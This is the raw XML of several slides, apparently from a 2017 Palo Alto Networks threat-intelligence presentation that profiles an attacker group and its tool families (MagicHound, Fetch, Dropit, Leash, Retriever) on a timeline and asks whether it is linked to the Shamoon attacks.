            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter"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fld id="{2993CA60-2B53-4F4B-9B5D-BDFFCE129C5C}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>11</a:t>
            </a:fld>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="561379" y="278012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000" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Active since ::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Early 2015</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" i="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Likes :: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PowerShell one liners, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> targets’ websites </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>and reconnaissance-on-crack scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Enjoys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> :: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Middle Eastern &amp; global tech (2:1 ratio)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="987163"/>
            <a:ext cx="6515100" cy="1445078"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350459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469939" y="275197"/>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MAGICHOUND</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599670" y="3966918"/>
            <a:ext cx="79194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971581" y="3306955"/>
            <a:ext cx="23483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p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620098" y="3732876"/>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522" y="4193161"/>
            <a:ext cx="1059180" cy="307777"/>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JAN ‘15</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2263673" y="3735336"/>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3865048" y="3737331"/>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a:off x="5480487" y="3738040"/>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7139584" y="3738040"/>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23320" y="4174693"/>
            <a:ext cx="1059180" cy="307777"/>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JAN ‘16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6701326" y="4179283"/>
            <a:ext cx="1059180" cy="307777"/>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JAN ‘17</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4229875" y="539298"/>
            <a:ext cx="3317010" cy="369332"/>
            <a:chOff x="4482500" y="158812"/>
            <a:chExt cx="3317010" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4482500" y="158812"/>
              <a:ext cx="331701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FETCH</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="38" name="Straight Arrow Connector 37"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5683945" y="326934"/>
              <a:ext cx="6389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721213" y="499551"/>
            <a:ext cx="3317010" cy="369332"/>
            <a:chOff x="4192224" y="518048"/>
            <a:chExt cx="3317010" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="TextBox 43"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4192224" y="518048"/>
              <a:ext cx="3317010"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DROPIT</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="47" name="Straight Arrow Connector 46"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5370177" y="702714"/>
              <a:ext cx="638908"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p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4053016" y="2225826"/>
            <a:ext cx="2998573"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nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="848497" y="3672529"/>
            <a:ext cx="473675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229899" y="142268"/>
            <a:ext cx="1818534" cy="369332"/>
            <a:chOff x="4512557" y="835699"/>
            <a:chExt cx="1818534" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="63" name="Straight Arrow Connector 62"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5692183" y="1014942"/>
              <a:ext cx="6389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512557" y="835699"/>
              <a:ext cx="1194582"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LEASH</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6303233" y="874347"/>
            <a:ext cx="2252898" cy="369332"/>
            <a:chOff x="6047078" y="89334"/>
            <a:chExt cx="2252898" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="TextBox 65"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6047078" y="89334"/>
              <a:ext cx="1933444"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RETRIEVER</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="67" name="Straight Arrow Connector 66"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7661068" y="274000"/>
              <a:ext cx="638908" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="AD236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a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6458241" y="1875853"/>
            <a:ext cx="1186695" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="AD236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876401" y="1529197"/>
            <a:ext cx="423575" cy="241371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IRANIAN NEW YEAR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3913441" y="907054"/>
            <a:ext cx="2169649" cy="369332"/>
            <a:chOff x="6449781" y="529802"/>
            <a:chExt cx="2169649" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6449781" y="529802"/>
              <a:ext cx="1933444"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OPENSRC</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="30" name="Straight Arrow Connector 29"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7980522" y="707719"/>
              <a:ext cx="638908"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765728" y="127137"/>
            <a:ext cx="1933444" cy="369332"/>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S PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OTHER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Arrow Connector 32"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7880252" y="321511"/>
            <a:ext cx="63890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cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2263673" y="2591824"/>
            <a:ext cx="5233241"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p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2200068" y="2927486"/>
            <a:ext cx="5676333"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4381735" y="1529197"/>
            <a:ext cx="423575" cy="241661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IRANIAN NEW YEAR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393408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7200" dirty="0"/>
              <a:t>LINK TO SHAMOON?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269153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AUG 2012</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14</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317500" y="470263"/>
            <a:ext cx="8471465" cy="1236073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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No public theories about threat actor behind SHAMOON attacks of 2012.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Previously considered a ‘one-off’ by many (including me)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724442" y="2644250"/>
            <a:ext cx="8489225" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘‘‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1,463</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DAYS SINCE OUR LAST SHAMOON INCIDENT.’’’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3272019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7200" dirty="0"/>
              <a:t>NOV 2016 ONWARDS…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3424165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16</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9292046" cy="52251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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="34702" y="49875"/>
            <a:ext cx="7240031" cy="1884138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="317539" y="323444"/>
            <a:ext cx="5947157" cy="3773051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1645991" y="3033932"/>
            <a:ext cx="7318728" cy="1770951"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625790" y="1415715"/>
            <a:ext cx="7518210" cy="2506070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3101373" y="49875"/>
            <a:ext cx="6116650" cy="2016759"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
